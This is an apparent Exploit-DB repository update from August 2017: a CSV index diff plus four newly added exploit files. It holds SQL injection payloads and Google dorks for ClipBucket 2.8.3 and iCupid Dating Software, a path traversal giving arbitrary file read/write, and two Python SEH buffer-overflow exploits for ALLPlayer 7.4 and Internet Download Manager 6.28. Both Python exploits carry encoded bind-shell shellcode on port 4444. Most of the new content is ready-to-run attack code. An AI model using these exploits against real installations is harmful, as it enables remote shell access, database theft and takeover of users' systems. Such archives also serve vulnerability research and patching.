DB: 2017-08-16

4 new exploits

Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion

Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)
Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)
Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)

Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting
Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting
AdvanDate iCupid Dating Software 12.2 - SQL Injection
ClipBucket 2.8.3 - Multiple Vulnerabilities

files.csv

@@ -5392,7 +5392,7 @@ id,file,description,date,author,platform,type,port
 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
-41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
+41454,platforms/windows/dos/41454.html,"Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
@@ -5429,7 +5429,7 @@ id,file,description,date,author,platform,type,port
 41658,platforms/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0
 41659,platforms/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0
 41660,platforms/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos,0
-41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0
+41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0
 41667,platforms/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos,0
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
@@ -9180,6 +9180,8 @@ id,file,description,date,author,platform,type,port
 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
+42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
+42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37999,7 +38001,7 @@ id,file,description,date,author,platform,type,port
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
-42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
+42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@@ -38254,3 +38256,5 @@ id,file,description,date,author,platform,type,port
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
+42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
+42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0

platforms/php/webapps/42457.txt

@@ -0,0 +1,65 @@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+.:. Exploit Title > ClipBucket 2.8.3 - Multiple Vulnerabilities
+
+.:. Google Dorks .:.
+"Forged by ClipBucket"
+inurl:view_collection.php?cid=
+
+.:. Date: August 15, 2017
+
+.:. Exploit Author: bRpsd
+.:. Skype contact: vegnox
+.:. Mail contact: cy@live.no
+
+.:. Vendor Homepage > https://clipbucket.com/latest
+.:. Software Link > https://github.com/arslancb/clipbucket/archive/4829.zip
+.:. Version: 2.8.3 latest!
+.:. Tested on > Linux, on local xampp
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+
+
+Vulnerability 1: Blind SQL Injection
+
+Type: boolean
+File: /view_collection.php
+Parameter: cid
+
+
+.:. POC .:.
+
+http://localhost/view_collection.php?cid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--&type=photos [columns count]
+http://localhost/view_collection.php?cid=1 AND 1=1&type=photos [true]
+http://localhost/view_collection.php?cid=1 AND 1=2&type=photos [false]
+
+
+
+
+
+Vulnerability 2: Arbitrary File Read/Write
+
+NOTE: Access Requires Admin Privilege!
+
+File: /admin_area/template_editor.php
+Parameter: file
+
+.:. POC .:.
+
+The template editor is suppose to allow editing html/css files only, but if you modify the file parameter you can escape the template directory then view OR edit any file actually of any extension.
+
+http://localhost/admin_area/template_editor.php?dir=cb_28&file=../../../index.php&folder=layout
+
+
+
+
+
+Vulnerability 3: Default & Weak admin password
+
+When you setup the CMS, the admin password is autocomplete set as [admin] unless you change it, lazy people will skip changing that field and end up having username and password as 'admin' which is pretty easy to guess!
+
+
+
+
+
+
+-Be safe.

platforms/php/webapps/42458.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: iCupid Dating Software 12.2 - SQL Injection
+# Dork: N/A
+# Date: 15.08.2017
+# Vendor Homepage : https://www.advandate.com/
+# Software Link: https://www.advandate.com/dating-software-features/
+# Demo: https://demo.advandate.com/
+# Version: 12.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?dll=music&sub=search&keyword=[SQL]
+# '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='
+# 
+# Etc...
+# # # # #
+
+

platforms/windows/local/42455.py

@@ -0,0 +1,54 @@
+#!/usr/bin/python
+# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode)
+# Version: 7.4
+# Date: 15-08-2017
+# Exploit Author: f3ci
+# Tested on: Windows 7 SP1 x86
+
+head = "http://"
+seh = "\x0f\x47" #0x0047000f
+nseh = "\x61\x41" #popad align
+junk = "\x41" * 301
+junk2 = "\x41" * 45
+
+#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed
+BufferRegister=EAX -f python
+#x86/unicode_mixed succeeded with size 782 (iteration=0)
+#Payload size: 782 bytes
+buf = ""
+buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
+buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
+buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
+buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
+buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
+buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
+buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
+buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
+buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
+buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
+buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
+buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
+buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
+buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
+buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
+
+#venetian
+ven = "\x56"            #push esi
+ven += "\x41"           #align
+ven += "\x58"           #pop eax
+ven += "\x41"           #align
+ven += "\x05\x04\x01"   #add eax,01000400
+ven += "\x41"           #align
+ven += "\x2d\x01\x01"   #add eax,01000100
+ven += "\x41"           #align
+ven += "\x50"           #push eax
+ven += "\x41"           #align
+ven += "\xc3"           #ret
+
+buffer = head + junk + nseh + seh + ven + junk2 + buf
+
+print len(buffer)
+f=open("C:\Users\Lab\Desktop\player.m3u",'wb')
+f.write(buffer)
+f.close()
+

platforms/windows/local/42456.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python
+# Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file'
+SEH Buffer Overflow (Unicode)
+# Date: 14-06-2017
+# Exploit Author: f3ci
+# Tested on: Windows 7 SP1 x86
+# How to exploit: Open IDM -> Downloads -> Find -> paste exploit string
+into 'Find file' text field
+
+#msfvenom -p windows/shell_bind_tcp LHOST=4444 -e x86/unicode_mixed
+BufferRegister=EAX -a x86 --platform windows -f python
+#Payload size: 782 bytes
+buf = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA"
+buf += "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ"
+buf += "1AIAIAJ11AIAIABABABQI1AIQIAIQI11"
+buf += "1AIAJQYAZBABABABABkMAGB9u4JB9lK8"
+buf += "4BYpIpM0QPTIwuP1y00dtKr0LpTK22Jl"
+buf += "4K1Bn4TKQbMXLOWGNjNFp1KODlml31al"
+buf += "zbnLKpI16olMiqfggrhrobNwrkb2N0tK"
+buf += "pJmlRk0Lzq2XJCpHkQxQoaRk29o0m1wc"
+buf += "dKa9jxzCmjq9dKoDdKm1fvMakOfLfavo"
+buf += "jmIqHGOHGp2UzVlCqmjXoKQmKtbUhd28"
+buf += "Bk28LdIq7cOvbkJlPKtK0XML9qvsDKlD"
+buf += "BkjaHPayq4LdmTQK1KQQR9aJoa9oGpoo"
+buf += "OoOjRkZrjKbmOmBHMcp2IpM0RH1g2SNR"
+buf += "OopTqXnlQglfzgkOyEtxdPKQIpIpmYy4"
+buf += "Ntb0Phlie0rKM09oXU2J9x0Yr0Xb9mq0"
+buf += "r0a0npC87zZoyO9PKOj5bwBHJbkPkaQL"
+buf += "e97vrJZp0VQGRHy2GknWBGYohUR7phUg"
+buf += "Gy08IoyovuogqXsDXlmk8aIoXUR7dWph"
+buf += "t5bNpMaQioVuQXrCbM34ypu9Gs1Gogb7"
+buf += "01xvrJjr29qF8bim365wPDldoLzajaTM"
+buf += "q4ldjpuvypMtR4np26of26Mv0VnnaFaF"
+buf += "OcpVPhD9HLOO1vio6u2iwpNnr6pFKO00"
+buf += "Ph9xBgMMOpyofuWKHpVUcrr6qXeVruUm"
+buf += "3mkO9EOLlFcLJjcPyk9PRUyugK0GN3RR"
+buf += "0o2Jip23yoj5AA"
+ 
+#venetian
+venetian = "\x53"           #push ebx
+venetian += "\x42"          #align
+venetian += "\x58"          #pop eax
+venetian += "\x42"          #align
+venetian += "\x05\x02\x01"  #add eax,01000200
+venetian += "\x42"          #align
+venetian += "\x2d\x01\x01"  #add eax,01000100
+venetian += "\x42"          #align
+venetian += "\x50"          #push esp
+venetian += "\x42"          #align
+venetian += "\xC3"          #ret
+
+nseh = "\x61\x47" # popad
+seh =  "\x46\x5f" # 0x005f0046 IDMan.exe
+
+buffer = "\x41" * 2192      #junk
+buffer += nseh + seh        #nseh + seh
+buffer += venetian          #venetian
+buffer += "\x42" * 109      #junk
+buffer += buf               #shellcode
+buffer += "HeyCanYouFind"   #junk
+buffer += "ThisFileHuh?"    #junk
+
+ 
+filename = "C:\\Users\Lab\Desktop\idm.txt"
+file = open(filename, 'w')
+file.write(buffer)
+file.close()
+print buffer
+print "[+] File created successfully"